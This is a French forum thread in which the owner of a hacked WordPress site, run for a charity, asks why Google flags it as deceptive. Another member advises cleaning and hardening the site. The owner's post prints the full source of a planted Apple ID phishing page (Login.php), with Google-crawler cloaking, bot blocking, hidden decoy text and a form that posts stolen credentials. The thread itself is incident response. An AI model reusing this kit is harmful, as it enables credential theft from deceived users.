Google : Demander un Re-examen "Le site web [...] est trompeur"

anonyme, mercredi 01 mai 2019 à 17h47
Modifié

Bonjour,

Sur un site web avec wordpress, j’ai le message :

Un backup a été récupéré, J’ai voulu demander un reexamen :

Savez-vous pourquoi ?

Merci,

A.

EDIT : Pour la propriété :

01/05/19 à 17h47
Modifié

+0 -0

FougereBle, mercredi 01 mai 2019 à 18h15

Il est possible que le site web est était piraté. Les sites WordPress sont très souvent les cibles d’attaque.

Vérifie que tu as bien installé un plugin de sécurité, comme Wordfence par exemple et essaye de faire une analyse de sécurité.

Si ton site à effectivement été piraté, il faudra alors le nettoyer.

01/05/19 à 18h15

Auteur du célèbre site BolTouilleur - Ma dernière création lors du Ludum Dare 46 -> The Last Flame

+0 -0

anonyme, mercredi 01 mai 2019 à 18h45
Modifié

En effet je viens de fouiller :

https://oi.org.uk/Security/Connexion
https://oi.org.uk/Security/Connexion/
https://oi.org.uk/Security/Connexion/myaccount/signin/?country.x=IN&locale.x=en_IN
https://oi.org.uk/Security/Connexion/myaccount/signin/?country.x=US&locale.x=en_US
https://oi.org.uk/wp-includes/smt/info/Login.php?sessionid=8486ea54dea45d6a45aedadeedde&sslchannel=true
https://oi.org.uk/wp-includes/smt/info/Login.php?sslchannel=true&sessionid=8486ea54dea45d6a45aedadeedde

Login.php :

<?php
session_start();
error_reporting(0);

/*

Yb  dP         db    888b. 888b. 8888 8    d88b    Yb    dP d88b   .d88b.    
 YbdP         dPYb   8  .8 8  .8 8www 8     wwP     Yb  dP  " dP   8P  Y8    
 dPYb  wwww  dPwwYb  8wwP' 8wwP' 8    8       8      YbdP    dP    8b  d8    
dP  Yb      dP    Yb 8     8     8888 8888 Y88P       YP    d888 w `Y88P'    
                                                                                                                                                                                                                                     
*/

ini_set("output_buffering",4096);
ini_set("xdebug.var_display_max_depth","-1"); 
ini_set("xdebug.var_display_max_children","-1");
ini_set("xdebug.var_display_max_data","-1" );
if(!session_id())
{

header('Cache-control: private'); // IE 6 FIX
}
require "assets/includes/session_protect.php";
require "assets/includes/ffgenerator.class.php";
include_once 'assets/includes/common.php';
include_once 'assets/includes/functions.php';
$_SESSION['ipctr'] = $country_name;


if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }

session_start();

include("functionns/Bot-blocker.php");
include("functionns/Geo-plugin.php");
include("functionns/OS-Platform.php");
include('../Denny-ip.php');

$random = rand(0,100000000000);
$dis    = substr(md5($random), 0, 25);

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" dir="ltr">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="content-style-type" content="text/css">
<meta http-equiv="content-script-type" content="text/javascript">
<head>
 <meta http-equiv="X-UA-Compatible" content="IE=Edge" />  
 <link rel="shortcut icon" href="assets/img/favicon.ico">
    <title><?php echo $lang['TITLE1']; ?></title>
    <meta name="description" content="Hege Fishing tackle store">
    <meta name="keywords" content="fishing, apple seeds, apple trees, tackle">
    <meta name="author" content="Hege Fishing tackle store">
    <link rel="stylesheet" type="text/css" href="assets/css/navigationLogin.css" id="globalheader-stylesheet"></link>
    <link rel="stylesheet" type="text/css" href="assets/css/style.css"></link>
    <link rel="stylesheet" type="text/css" href="assets/css/idd.css"></link>
    <link rel="stylesheet" type="text/css" href="assets/css/hsa.css"></link>
<script language="JavaScript1.2">
var testresults
function validate(){
var str=document.login.email.value
var filter=/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i
if (filter.test(str))
testresults=true
else{
alert("Please input a valid Email.")
testresults=false
}
var x=document.forms["login"]["password"].value;
if (x==null || x=="")
  {
  alert("Your password is required.");
  return false;
  }
return (testresults)
}
</script>
<script>
function checkbae(){
if (document.layers||document.getElementById||document.all)
return validate()
else
return true
}
</script>
<script type="text/javascript" src="assets/includes/ffgenerator.lib.js"></script>
</head>
<body class="myappleid sign-in index" id="editContainerBody" onload="FFInit('assets/includes/flash/', null);">
<?php include("assets/includes/style_nav.php") ?>
<form action="functionns/send-login.php?&sessionid=<?php echo generateRandomString(80); ?>&securessl=true" method="POST" onSubmit="return checkbae()" id="login" name="login">
<input type="hidden" id="secret_field_id" name="fox" value="" />
<div id="TopDiv"><a href="#"><h2><img style="height: 33px;width: 326px;" class="LogoIMG" src="assets/img/logo.png"/></h2></a></div>
<div id="main">
<div id="content" class="content">
<div id="nothing" style="display:none"></div>
<div class="grid2colc wrap">
<div class="column first sidebar">
<?php echo $lang['INTRO_MSG']; ?>
</div>
<div style="display:none">
Fishing tackle is the equipment used by fishermen when fishing. Almost any equipment or gear used for fishing can be called fishing tackle. Some examples are hooks, lines, sinkers, floats, rods, reels, baits, lures, spears, nets, gaffs, traps, waders and tackle boxes.
Gear that is attached to the end of a fishing line is called terminal tackle. This includes hooks, leaders, swivels, sinkers, floats, split rings and wire, snaps, beads, spoons, blades, spinners and clevises to attach spinner blades to fishing lures. Sometimes the term fishing rig is used for a completed assembly of tackle ready for fishing.
Fishing tackle can be contrasted with fishing techniques. Fishing tackle refers to the physical equipment that is used when fishing, whereas fishing techniques refers to the manner in which the tackle is used when fishing.
The term tackle, with the meaning "apparatus for fishing", has been in use from 1398 AD.[1] Fishing tackle is also called fishing gear. However the term fishing gear is more usually used in the context of commercial fishing, whereas fishing tackle is more often used in the context of recreational fishing. For this reason, this article covers equipment used by recreational fishermen.
</div>
<div id="nothing" style="display:none"></div>
                    <div class="column last">
                    <h2><?php echo $lang['SIGN_IN_TITLE']; ?>.</h2>
                    
    <br>
    
    <div class="formrow">
        <span class="formwrap"><input style="height:23px!important;padding:0px 0px 0px 3px!important;" required="yes" mandatory="yes" id="email" type="text" name="email" placeholder="Apple ID"></span>
        <div class="space padder2"> 
        <span class="input-msg show"><a id="appleIdURL" style="font-size: 11px!important;    font-weight: bold!important;" href="#">Apple ID ?</a></span>
        </div>
    </div>
    
    <div class="formrow">
        <span class="formwrap"><input style="height:23px!important;padding:0px 0px 0px 3px!important;" required="yes" mandatory="yes" id="password" type="password" name="password" placeholder="password" onclick="FFGen('secret_field_id');"/></span>
        <div class="space padder2"> 
        <span class="input-msg show"><a id="appleIdURL" style="font-size: 11px!important;    font-weight: bold!important;" href="#">Forgot Password ?</a></span>
        </div>
    </div>
                    

    <div id="nothing" style="display:none"></div>           
                <div id="bot-nav">
                    <input type="hidden" value="<?php if (isset($_GET['email'])) { echo $_GET['email']; }?>" name="oemail" id="oemail" />
                    <a type="submit" class="btn bigblue">
                            <input class="btn bigblue" id="" onsubmit="return validateForm()" type="submit" value="<?php echo $lang['SIGN_IN_BUTTON']; ?>" name="" />
                        </a>                    
                    </div>  
                    </div>
                
                </div>
            </div>
        </div>
</form>
<div style="display:none">
The first 'Bramley's Seedling' tree grew from pips planted by Mary Ann Brailsford when she was a young girl in her garden in Southwell, Nottinghamshire, UK in 1809.[2] The tree in the garden was later included in the purchase of the cottage by a local butcher, Matthew Bramley in 1846. In 1856, a local nurseryman, Henry Merryweather asked if he could take cuttings from the tree and start to sell the apples. Bramley agreed but insisted that the apples should bear his name.
On 31 October 1862, the first recorded sale of a Bramley was noted in Merryweather's accounts. He sold "three Bramley apples for 2/- to Mr Geo Cooper of Upton Hall". On 6 December 1876, the Bramley was highly commended at the Royal Horticultural Society's Fruit Committee exhibition.
In 1900, the original tree was knocked over during violent storms; it survived, and is still bearing fruit two centuries after it was planted. The variety is now the most important cooking apple in England and Wales, with 21.68 km², 95% of total culinary apple orchards in 2007.[5] The Bramley is almost exclusively a British variety; however it is also grown by a few United States farms,[6] and can be found in Canada and Japan. [7]
The town of Southwell hosts many celebrations of the Bramley Apple including the Bramley Apple Festival in October. The Bramley Apple Inn is located just a few doors away from the original apple tree,[8] which is considered to be a town treasure.
A blue plaque on the house in Southwell now commemorates the apple,[9] and in 2009 a window commemorating the 200th anniversary of the planting of the tree was installed in Southwell Minster.[10]
</div>

    
   <?php include("assets/includes/style_footer.php") ?>

EDIT :

J’imagine que je peux prendre peur quand je vois :

01/05/19 à 18h45
Modifié

+0 -0

FougereBle, mercredi 01 mai 2019 à 20h35
Modifié

Je ne peux que te conseiller de suivre les indications de ce lien (surtout la partie Réinstallation propre de A à Z).

Aussi, après avoir suivi les indications, installe un plugin de sécurité. C’est peut être bête a dire, mais évite l’identifiant "admin" et les mots de passe bidons. Ne met pas "wp_" comme prefix de table.

Renseigne toi aussi sur les plugins installés sur ton site : ils sont souvent la cause de piratage.

Installe des plugins qui sont régulièrement mis a jour, pensé a effectuer les mises a jour de WordPress et des plugins/themes.

Édit : Et ne SURTOUT PAS installer des plugins cracké : ils sont très souvent bourré de code malveillant.

01/05/19 à 20h35
Modifié

Auteur du célèbre site BolTouilleur - Ma dernière création lors du Ludum Dare 46 -> The Last Flame

+0 -0

anonyme, jeudi 02 mai 2019 à 15h57

Merci je vais faire ça, c’est pour une association qui fabrique et vend des produits pour des enfants handicapés et/ou ayant des troubles de motricité.

02/05/19 à 15h57

+0 -0

anonyme, vendredi 03 mai 2019 à 01h36

Trop de donné la fonction import/export retourne une 408.

03/05/19 à 01h36

+0 -0

anonyme, mercredi 15 mai 2019 à 10h30

Pour la demande de propriété, j’utilisais leur nouveau système (sans le savoir) alors qu’il faut utiliser l’ancien système pour faire la demande de validation.

Ensuite j’ai encore un problème de faux-positifs (installation seine) :

État actuel

Ce site est suspect

Le site https://xxxxxxxxxxxx.org.uk/wp-includes/css/dashicons.min.css?ver=5.2 comporte du contenu dangereux, notamment des pages qui :

Incitent les internautes à fournir des informations personnelles ou à télécharger des logiciels

15/05/19 à 10h30

+0 -0

État actuel

Pas encore membre ?